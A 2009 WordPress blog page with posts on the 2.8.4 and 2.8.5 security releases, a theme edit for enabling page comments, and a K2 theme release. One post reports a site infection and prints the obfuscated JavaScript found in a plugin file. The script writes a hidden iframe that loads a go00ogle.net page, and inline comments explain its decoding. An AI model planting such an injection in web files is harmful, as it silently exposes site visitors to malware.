The WordPress team decided to call 2.8.5 a hardening release because it includes some security features that were back-ported to 2.8.x from the upcoming 2.9 series. Below are some details about 2.8.5 from the WordPress development blog:
As you know, over the past couple of months we have been working on the new features for WordPress 2.9. We have also been working on trying to make WordPress as secure as possible, and during this process we have identified a number of security hardening changes that we thought were worth back-porting to the 2.8 branch so as to get these improvements out there and make all your sites as secure as possible.
The headline changes in this release are:
A fix for the Trackback Denial-of-Service attack that is currently being seen.
Removal of areas within the code where PHP code in variables was evaluated.
Switched the file upload functionality to be whitelisted for all users including Admins.
Retiring of the two importers of Tag data from old plugins.
For some time now, comments have been disabled on pages in K2 and Unwakeable. The modifications needed to allow comments on pages are extremely easy to make. If you use either of these themes and wish to enable comments on pages, please continue reading.
1. Open the page.php file located in your K2 or Unwakeable theme directory. Go to line 36; it should look like this:
<?php if ( get_post_custom_values('comments') ): ?>
2. Comment out that if statement, so it should look like this when you’re done:
3. You’re halfway done at this point. Now go to line 40, which should look like this:
<?php endif; ?>
4. Comment out this piece of code as well, so that line 40 looks like the code below.
<?php //endif; ?>
5. Save the page.php file and you should be all set.
I will make this modification in the next release of Unwakeable so you won’t have to modify it yourself. You can expect to see a new version of Unwakeable released within a week.
WordPress 2.8.4 has been released. It’s a security release, which means you should upgrade immediately. This version fixes a problem that could allow remote users to reset the administrative password. Below is a summary from the WordPress development blog:
Yesterday a vulnerability was discovered: a specially crafted URL could be requested that would allow an attacker to bypass a security check to verify a user requested a password reset. As a result, the first account without a key in the database (usually the admin account) would have its password reset and a new password would be emailed to the account owner. This doesn’t allow remote access, but it is very annoying.
Published by Tyler on August 11, 2009 at 9:42 am
So, as many visitors have probably noticed, longren.org has been listed as a suspicious site by Google. Visiting this site in Firefox will result in Firefox warning you that you could be visiting a website that could harm your computer.
Turns out this blog was infected with a go00ogle.net malware script. After following this helpful blog post, I was able to pinpoint the Audio Player plugin for WordPress as the culprit. The infected file was audio-player.js, and contained this snippet of code that should not have been there:
function advQuery(){
// "google.com" is a decoy: substr(0,9) + "00" + substr(9,5) rebuilds "http://go00ogle."
var adv="http://google.com/";abs=unescape("%69%66%72%61%6D%65");Track="?sid=1";get=unescape("%6E%65%74"); // abs decodes to "iframe", get to "net"
document.write("<"+abs+" src="+adv.substr(0,9)+unescape("\u0030\u0030")+adv.substr(9,5)); // "\u0030\u0030" is "00"
document.write(get+"/go.php"+Track+" style=display:none><"+"/"+abs+">"); // closes the tag: a hidden iframe loading go00ogle.net/go.php?sid=1
};advQuery();
I decided to just deactivate that plugin instead of deleting that piece of code from audio-player.js. This way there’s no chance audio-player.js will become infected again.
K2 1.0-RC8 has been released. It has support for threaded comments and child themes. You can also edit the post meta without having to modify any code now. A list of bug fixes can be found here, and below is the full post from the K2 blog:
This release adds support for Threaded Comments and Child Themes. Styles have been improved. You can specify where Styles are stored, activate multiple styles, and edit them in the WordPress Theme Editor. You can also now customize the Post Meta (the line that reads Published by John Doe…) without having to edit any code.
I plan on building the next version of Unwakeable in the next couple weeks and will likely base it off of K2 1.0-RC8.